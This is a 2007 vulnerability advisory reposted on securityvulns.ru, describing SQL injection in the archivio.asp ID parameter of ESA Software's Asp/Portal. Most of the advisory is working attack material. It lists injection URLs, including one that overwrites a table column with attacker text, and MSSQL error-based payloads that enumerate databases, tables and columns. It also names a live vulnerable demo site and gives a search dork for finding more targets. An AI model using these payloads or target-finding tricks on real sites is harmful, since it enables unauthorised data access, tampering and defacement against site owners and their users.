Computer Security

Security Advisory: ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Sciurus Hosting Panel Code İnjection

  Myspace Clone Script (index.php) Remote File Inclusion Vulnerability

  Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability

  net-finity (links.php) Remote SQL Injection Vulnerability

From:okan alp <codexploder_(at)_hotmail.com>
Date:18.11.2007
Subject:ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection

ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection

Credit : CodeXpLoder'tq

Mail   : codexploder[at]hotmail[dot]com

Site   : codexploder.biyosecurity.net,biyofrm.com

Sourge : http://www.esasoftware.com

£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££
£££

Thnx   : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A

Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman

and

BiyoSecurity all members

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^

1-)  example.com/[patch]/archivio.asp?ID=sql methot)

1-)  example.com/wwww/archivio.asp?ID=sql methot)

£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££
££££

2-) example.com/[patch]/archivio.asp?ID=(sql methot)

2-) example.com/www/archivio.asp?ID=(sql methot)

2-) example.com/www/archivio.asp?ID=1'

2-) example.com/www/archivio.asp?ID=1 having 1=1

2-) example.com/www/archivio.asp?ID=1,2,3,4,5

2-) example.com/www/archivio.asp?ID=1,2,3,4,
5+update+tbl+set+column='your text or meta code';--

2-) example.com/events/archivio.asp?ID=1 group by tbl.column having 1=1

#for db : convert(int, db_name(1)

     : convert(int, db_name(2)

#for other tbl    : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))


#tbl    : sezioni
#column : sezione

##########################################################

demo site: http://www.mondoesa-milano.com/www/archivio.asp?ID=5

google search code :  inurl:"www/archivio.asp"

demo site tablo list : http://codexploder.biyosecurity.net/alltabllo.JPG

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru